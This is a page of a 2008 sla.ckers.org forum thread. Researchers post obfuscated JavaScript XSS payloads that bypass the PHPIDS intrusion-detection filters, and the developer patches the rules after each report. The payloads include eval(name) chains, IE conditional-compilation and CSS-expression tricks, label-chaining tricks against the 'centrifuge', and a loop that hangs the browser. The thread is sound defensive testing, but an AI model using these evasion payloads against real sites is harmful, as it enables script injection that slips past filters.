Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...1819202122232425262728...LastNext
Current Page: 23 of 31
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: October 27, 2008 11:23PM

how about a feature request and a bug all in one :)

injection:
t=this
y=('nam')
x=t.eval
x(x(y+ ('e')+new Array)+y)

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: October 28, 2008 04:49AM

Hi!

We figured it out - the admins seem to have upgraded the PHP - but w/o Unicode support for the PCRE. That why the centrifuge didn't work at all. Fix will be deployed within the next hours...

@thornmaker: I will take care about the feature request asap :)

<edit>That issue btw caused the problem... should be fixed by our admins any second - thx admins :)</edit>



Edited 2 time(s). Last edit at 10/28/2008 06:22AM by .mario.

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: October 30, 2008 01:02AM

IE only. code is:

@cc_on eval(@cc_on name)

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: October 30, 2008 05:12AM

Small but ev[ia]l - I just added a rule for conditional compilations plus test case. Thx :)

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: October 30, 2008 12:33PM

Here's a IE only one:-
http://www.businessinfo.co.uk/labs/phpids/phpids4.html

document.body.style.cssText=name

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: October 30, 2008 12:43PM

... with CSS expression in the name - nice ;)

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: October 30, 2008 12:46PM

Yeah what's sweet about this one is that no parenthesis are required.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: November 04, 2008 06:39PM


Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: November 23, 2008 10:04PM

@.mario: i like the layout on the demo page a lot better now, thanks for changing! for(i=0;;)i is a small DoS injection that Firefox 3.0.4 chokes on - IE8 and Opera 9.62 both allow you to abort.

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: November 25, 2008 07:19AM

thx - fixed!

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: December 07, 2008 04:02AM

This is unfortunately what happens when I'm sick with the flu and can't sleep...
xxx='javascr',xxx+=('ipt:eva'),xxx+=('l(n'),xxx+=('ame),y')
Cen:tri:fug:eBy:pas:sTe:xt:do location=(xxx)
while(0)

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: December 07, 2008 10:51AM

Nice one! Fixed..

Get well soon! Effing flu...

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: December 07, 2008 07:09PM

almost
x='javascr',x+=('ipt:eva'),x+=('l(na'),x+=('me),y')
abc:def:ghi:jkl:mno:pqr:stu:vwx:yza:bcd:do location=(x)
while(0)

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: December 08, 2008 03:07AM

Ouch - something went wrong with uploading the new filters yesterday. Fixed! I also added a small potion of regex to detect the concat pattern. better safe than sorry :)

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: December 08, 2008 09:40AM

@thornmaker

That's awesome, I can't figure out why that should be correct js syntax though. What is the interpreter doing?

It seems to be using the ":" as or statements even though it shouldn't be possible to define a block that way at least I thought.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: December 08, 2008 12:43PM

the ":" is just the label syntax in javascript, and I've chained a bunch of them together. Nothing special there - several of my other bypasses have used that to get around the centrifuge, though usually i put such text at the beginning or end of the injection (in this case, the "do location" bit worked better with a label before it though, iirc).

As your twitter pointed out, labels can have non standard ascii chars, and also other unicode oddities as well: javascript:\u0061\u0300:alert(0)

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: December 08, 2008 03:46PM

Well what I found interesting was the fact that label statements seem to be able to link together as or statements. For example :-

//Raises a syntax error "c is undefined"
a:b:c

//doesn't
a:b:c:alert(1)

The docs seem to suggest only one label is allowed and there's no mention of or statements

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: December 08, 2008 04:09PM

Yep - first one is a label for a label for something undefined - while the other is a label for a label for something known.

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: December 08, 2008 04:30PM

Yes but the code seems to be ignored for the other statements. After all they are all undefined so the parser should raise an error. Does anyone know anywhere where this is documented?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: December 08, 2008 10:20PM

a label is really just a prefix before the true statement and itself should not be thought of as a statement. in your a:b:c example, only the a and b are actual labels, the c is the statement which is presumably undefined.

that they can be chained together is kinda nifty



Edited 1 time(s). Last edit at 12/08/2008 10:21PM by thornmaker.

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: SpoofGhost
Date: December 09, 2008 08:40AM

why not try to create a self enhancing script. instead of updating it manually every time!

its just a proposal but it could be nice to try and create. maybe create some sort of honny pot cature the attack and create a regex for it automaticly..
i'm really not sure how far this is possible but it would be great to see.

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: December 09, 2008 08:59AM

We kind of already have this via the centrifuge. Okay - it doesn't learn but it is capable of detection attacks without using the blacklist based filter rules.

Creating regex rules on the fly - phew. Based on which criteria the question is ;)

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: December 09, 2008 09:14AM

@thornmaker @mario

The labels do refer to the same code which is interesting.

aa:bb:for(i=0;i<10;i++) {
   alert(i);
   break aa;//works
   break bb//works
   break cc//label not found
}

@SpoofGhost

The only way that would be possible would be using AI. The computer would have to know what each attack means and would have to decide if someone was trying to create a malicious reg exp rule.

Auto blocking firewalls have the same problem because if you make a spoofed request as a malicious attack it could block a root dns server or other host.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: December 09, 2008 11:03AM

.mario - couldn't the centrifuge detection rules be rewritten as regex's? For various reasons (like performance) you might not want to, but as far as I can tell, the rules are functionally equivalent to regular expression rules.

I haven't tested this much, but to do this I think you would need to chain together some look ahead rules... something like... /a(?=(.*b){2,})(?=(.*c){2,})/ should match the a only if it is followed with 2 or more b's and 2 or more c's but the b's and c's can be in any order and have other text mixed in. for the IDS, you would replace a with the start anchor and replace b and c each with whatever class of characters the centrifuge is trying to pick up.

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: December 09, 2008 11:34AM

@thornmaker: Hmmm - dunno. I try to avoid lookaheads/lookbehinds. You mean to more easily place them in an external file/port them? Or for another reason?

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: December 09, 2008 11:53AM

@.mario: I'm not suggesting you should rewrite the centrifuge. I'm just curious if it is theoretically possible (the mathematician in me). The only advantage I can see in rewriting would be to have all the detection logic in the same place so the code is more portable, but this doesn't seem to be an issue really.

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: December 22, 2008 03:02PM

phpids eats backslashes:-

\a\l\e\r\t\(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: December 23, 2008 05:06AM

Snap - yes. The demo did. Fixed, thx!

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: January 03, 2009 03:55AM

[url=http://demo.phpids.org/?test=foo:bar:boo:far:oof:boa:%0a(this)%5b(%20'a')%2b%20(new Array)%2b%20('lert')%20%2bnew%20Array%5d(0)]foo:bar:boo:far:oof:boa:
(this)[( 'a')+ (new Array)+ ('lert') +new Array](0)
[/url]

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: January 03, 2009 11:04AM

@thornmaker

Oooooo nice :) I might do one later after the footy ;) You inspired me

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Pages: PreviousFirst...1819202122232425262728...LastNext
Current Page: 23 of 31


Sorry, only registered users may post in this forum.